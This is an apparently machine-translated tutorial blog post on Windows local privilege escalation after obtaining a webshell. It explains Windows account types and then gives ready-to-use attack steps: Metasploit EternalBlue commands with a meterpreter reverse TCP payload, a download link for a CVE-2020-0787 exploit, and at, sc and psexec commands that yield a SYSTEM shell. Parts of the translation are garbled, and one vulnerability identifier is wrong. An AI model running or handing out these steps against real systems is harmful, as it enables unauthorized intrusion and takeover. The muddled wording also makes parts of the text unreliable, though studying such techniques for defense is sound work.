Learning of local rights

Raise the right , As the name suggests, it's about raising authority , When we getshell After a website , Most of the time, our authority is very low （ It's usually just a apache jurisdiction ）. At this time for “ exploit victory ”, You need to take advantage of the right to raise , To make the original low privilege （ Only column directory is allowed ）–> high authority （ Have the ability to modify files ）, Raise your authority , Help us continue to penetrate .

Classification of right raising ：

Local rights
Database delivery
Third party software rights

Windows and Linux It is also these three ways to raise rights , This article is based on Windows As an example of .

——
——

To understand first windows Permission classification in .

system jurisdiction ： yes Windows The highest level of authority in the system , There are some operations that need to be System Permission to complete , For example, modify the core key value of the registry 、 Force the end of malicious application processes, etc .
Administrator rights ： Have the highest management and use rights , Can change all settings of the system , You can install and remove programs , Can access all the files on the computer . besides , It also has the right to control other users .
And lower permissions ……

——
——

Account type

stay windwos Command line or win+r Input in netplwiz , Sure windwos Existing user accounts in .
You can see user goodric stay administrators In the group , That is, administrator permission .

And there are many other groups , Represent different permissions . You can grant different permissions to the account .

Several common account permissions ：
Administrator： The administrator has full access to the computer , You can make any changes you need . According to notification settings , The administrator may be asked to provide a password or confirmation before making changes that will affect other users .

User： Standard account users can use most software , And you can change the system settings that do not affect other users .
Guest： By default , Guests have the same access as members of the user group i Ask right , But the system of Laiguang and Zhangguang is more

There are also several other types of account permissions ：

PowerUser：
Outside the program , You can also run legacy applications
PrintOperator：
The print operator can gain control of the printer
BackupOperator：
Backup operators can override security restrictions only for the purpose of backing up or restoring files

webshell After that, the authority will be upgraded

getshell after , The way to raise the right is to raise the right of the system kernel , Like the blue of eternity ms07-010 Raise the right , yes 445 A vulnerability in the port .
Use system kernel vulnerabilities , You can use first wesng The tool detects vulnerabilities and defects in the target .
wesng A brief introduction to the use of ： testing Windows Safety defect tool wesng To learn and use

After detecting possible vulnerabilities , It can be used msf Raise rights for specific vulnerabilities .

Use msf17-010 Loophole

use exploit/windows/smb/ms17_010_eternalblue

Set up payload

set payload windows/x64/meterpreter/reverse_tcp

Set the target ip

set rhost 192.168.43.56

perform

run

And then it goes in meterpreter Command line
Get the target machine system jurisdiction .

——
——

Demonstration of several local rights raising methods

1、 System kernel vulnerability rights

Here we use cve-2020-0787 A loophole in ,github Download it exp：
https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases

And put this exe Drag files in cmd Execute from the command line , That is, the path to execute this file .

After performing , Will pop up own system The powers of the cmd Command line .

2、at Order to claim power

Affects version ：Win2000 & Win2003 & XP

Is to set a scheduled task , When the planned time comes, the planned task will be executed cmd.exe
stay 14:46 Plan execution cmd.exe

at 14:46 /interactive cmd.exe

View currently scheduled tasks

at

When it's time to plan , You can see , A pop-up with system The powers of the cmd Command line .

3、sc Order to claim power

Affects version ：win 7、win8、2003、2008

sc The command has a requirement , A space is required between the equal sign and the value .
Create a file called test The interactive cmd service .

sc create test binPath= “cmd /K start” type= own type= interact

Execute this created interactive service

sc start test

After performing , A pop-up with system The powers of the cmd Command line

Here should be run as an administrator cmd To execute the following commands . Otherwise, access will be denied .

4、ps Order to claim power

Affects version ：Win2003 & Win2008
Download Kit ：
https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

In download psexec.exe Execute the command in the file directory ：

psexec.exe -accepteula -s -i -d cmd.exe